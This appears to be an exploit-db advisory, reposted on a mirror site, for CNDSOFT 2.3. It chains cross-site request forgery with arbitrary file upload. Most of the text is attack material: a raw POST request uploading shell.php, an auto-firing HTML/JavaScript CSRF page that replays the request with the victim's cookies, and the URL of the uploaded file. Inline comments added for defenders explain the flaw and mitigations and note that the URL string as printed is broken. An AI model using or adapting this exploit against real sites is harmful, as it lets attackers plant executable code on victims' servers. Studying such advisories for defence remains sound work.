CNDSOFT 2.3 – Cross-Site Request Forgery / Arbitrary File Upload

  • 作者: Besim
    日期: 2016-10-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40575/
  • *=========================================================================================================
    # Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
    # Author: Besim
    # Google Dork: -
    # Date: 19/10/2016
    # Type: webapps
    # Platform: PHP
    # Vendor Homepage: -
    # Software Link: http://www.phpexplorer.com/Goster/1227
    # Version: 2.3
    *=========================================================================================================
    
    
    Vulnerable URL and Parameter
    ========================================
    
    Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
    
    Vulnerable Parameter = &mesaj_baslik
    
    
    TECHNICAL DETAILS & POC & POST DATA
    ========================================
    
    POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
    Host: localhost:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
    ——
    Content-Type: multipart/form-data; boundary=---------------------------5035863528338
    Content-Length: 1037
    
    -----------------------------5035863528338
    Content-Disposition: form-data; name="utf8"
    
    ✓
    -----------------------------5035863528338
    Content-Disposition: form-data; name="authenticity_token"
    
    CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
    -----------------------------5035863528338
    Content-Disposition: form-data; name="kullanici_adi"
    
    meryem
    -----------------------------5035863528338
    Content-Disposition: form-data; name="kullanici_sifresi"
    
    meryem
    -----------------------------5035863528338
    Content-Disposition: form-data; name="kullanici_mail_adresi"
    
    m@yop.com
    -----------------------------5035863528338
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    30000
    -----------------------------5035863528338
    Content-Disposition: form-data; name="kullanici_resmi"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php
    	phpinfo();
    
     ?>
    -----------------------------5035863528338
    Content-Disposition: form-data; name="personel_maasi"
    
    5200
    -----------------------------5035863528338--
    
    
    CSRF PoC - File Upload (Shell.php)
    
    ========================================
    
    <html>
    <!-- CSRF PoC -->
    <!-- Defender's reading: when a user who is logged in to the target opens this
         page, the script below auto-submits the same multipart POST shown in the
         captured request above, cross-site, with the victim's cookies attached.
         It can only succeed if the server neither validates the CSRF token against
         the session nor restricts what the "kullanici_resmi" upload may contain. -->
    <body>
    <script>
    // Builds the forged multipart upload request and sends it with XMLHttpRequest.
    // Takes no parameters and returns nothing; called once on load (below) and from the button.
    function submitRequest()
    {
    var xhr = new XMLHttpRequest();
    // NOTE(review): the URL literal is split across two lines in this transcript; as
    // printed it is not a valid JavaScript string (a raw line break inside quotes).
    xhr.open("POST", "
    http://site_name/ofis/index.php?is=kullanici_tanimla", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
    // Ask the browser to attach the target origin's cookies, so the request rides the
    // victim's live session. A SameSite=Lax/Strict session cookie would stop the browser
    // from sending them on a cross-site request like this one.
    xhr.withCredentials = true;
    // Multipart body, mirroring the captured POST field by field.
    var body = "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"utf8\"\r\n" +
    "\r\n" +
    "\xe2\x9c\x93\r\n" +
    "-----------------------------5035863528338\r\n" +
    // The token value below is copied verbatim from the captured request. Replaying a
    // fixed value can only work if the server does not bind the token to the session and
    // check it on every state-changing request — that missing check is the CSRF defect.
    "Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
    +
    "\r\n" +
    "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
    "\r\n" +
    "meryem\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
    +
    "\r\n" +
    "meryem\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
    "\r\n" +
    "m@yop.com\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
    "\r\n" +
    "30000\r\n" +
    "-----------------------------5035863528338\r\n" +
    // The "profile picture" part carries a PHP file. The advisory's "Access File" URL
    // (personel_resimleri/shell.php) suggests the server stores it under the web root with
    // its original name, i.e. without an extension/content check — presumably; confirm
    // against the server-side handler. Mitigation: allow-list image extensions, verify the
    // content, and keep uploads outside the document root or in a non-executable location.
    "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x3c?php \r\n" +
    "\tphpinfo();\r\n" +
    "\r\n" +
    " ?\x3e\r\n" +
    "-----------------------------5035863528338\r\n" +
    "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
    "\r\n" +
    "5200\r\n" +
    "-----------------------------5035863528338--\r\n";
    // Each character code becomes one byte, so the escaped bytes above (e.g. \xe2\x9c\x93)
    // and the boundary lines are sent exactly as written rather than re-encoded.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    }
    // Fires as soon as the page loads; the form button below is only a manual trigger.
    submitRequest();
    </script>
    <form action="#">
    <input type="button" value="Submit request"
    onclick="submitRequest();" />
    </form>
    </body>
    </html>
    
    ========================================
    
    Access File: http://www.site_name/path/personel_resimleri/shell.php
    
    
    RISK
    ========================================
    
    An attacker can upload arbitrary files (including PHP scripts) through a forged cross-site request, and the uploaded file is then reachable under the web root.
    
    
    --
    
    Besim ALTINOK